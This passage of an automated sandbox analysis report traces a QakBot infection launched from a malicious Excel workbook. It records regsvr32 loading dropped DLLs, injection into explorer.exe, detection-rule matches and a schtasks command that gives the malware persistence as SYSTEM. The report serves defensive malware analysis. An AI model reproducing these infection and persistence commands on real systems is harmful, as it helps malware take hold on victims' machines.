          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_011149C5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01113DF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_011115FD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01112420
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_0110F045
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01118490
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01114CBF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_011110C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01111721
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01105394
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_0111E7D6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_0111C24F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01110A6B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01111EBA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_0111B6CA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0066F045
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00672420
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_006710C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00674CBF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00678490
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00671968
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00678D30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00673DF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_006715FD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_006709C5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_006749C5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_006755B5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00670A6B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0067C24F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0067B6CA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00671EBA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00671721
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0067E7D6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00665394
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 652
          Source: gihi2.dll.13.drStatic PE information: No import functions for PE file found
          Source: gihi1.dll.4.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
          Source: 00000004.00000002.973589332.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 0000000D.00000002.713096999.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 13.2.explorer.exe.660000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 6.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 4.2.explorer.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 4.2.explorer.exe.1100000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 3.2.regsvr32.exe.1120000.2.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 6.2.regsvr32.exe.f30000.2.raw.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 6.2.regsvr32.exe.f30000.2.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 3.2.regsvr32.exe.1120000.2.raw.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 13.2.explorer.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@20/19@2/1
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000A1C7 CreateToolhelp32Snapshot,memset,Process32First,FindCloseChangeNotification,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10009CB8 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002297 StartServiceCtrlDispatcherA,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002297 StartServiceCtrlDispatcherA,
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{71922192-0266-41D2-A0F0-3628639BB9C8}
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess6700
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{264525F5-7A27-4045-91D4-FDDDDA7BFE75}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess7092
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{264525F5-7A27-4045-91D4-FDDDDA7BFE75}
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{EF4E487D-8367-44BE-A024-25DD7810F9BF} - OProcSessId.datJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: plan-1053707320.xlsbVirustotal: Detection: 25%
          Source: plan-1053707320.xlsbReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi2.dll
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\gihi1.dll'
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\gihi1.dll'
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 652
          Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\gihi1.dll'
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\gihi1.dll'
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 652
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi2.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\gihi1.dll'
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\gihi1.dll'
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: plan-1053707320.xlsbInitial sample: OLE zip file path = xl/media/image1.png
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.716292885.0000000003244000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942057600.0000000003421000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdbs source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.716161142.000000000323E000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdbH source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: regsvr32.pdbk source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdbM source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: gCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.727844501.0000000002E72000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.953457269.0000000000472000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.716177962.000000000324A000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: regsvr32.pdb source: WerFault.exe, 0000000F.00000003.716155261.0000000003238000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000F.00000003.716161142.000000000323E000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942178479.0000000000840000.00000004.00000001.sdmp
          Source: Binary string: regsvr32.pdb( source: WerFault.exe, 0000000F.00000003.716155261.0000000003238000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942167491.000000000083A000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdbT source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdby source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: sfc.pdbK source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdbv source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdbN source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000F.00000003.716177962.000000000324A000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942198358.000000000084C000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: setupapi.pdbB source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdbk source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb| source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000F.00000003.716292885.0000000003244000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942187790.0000000000846000.00000004.00000001.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdbe source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000E5F3 LoadLibraryA,GetProcAddress,
          Source: gihi1.dll.4.drStatic PE information: section name: .code
          Source: gihi1.dll.4.drStatic PE information: section name: .rdataf
          Source: gihi2.dll.13.drStatic PE information: section name: .code
          Source: gihi2.dll.13.drStatic PE information: section name: .rdataf
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], edx
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], ebp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], edi
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], ecx
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax

          Persistence and Installation Behavior:

          barindex
          Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\gihi1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\gihi2.dllJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ka[1].htmJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htmJump to dropped file
          Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\gihi1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\gihi2.dllJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htmJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ka[1].htmJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
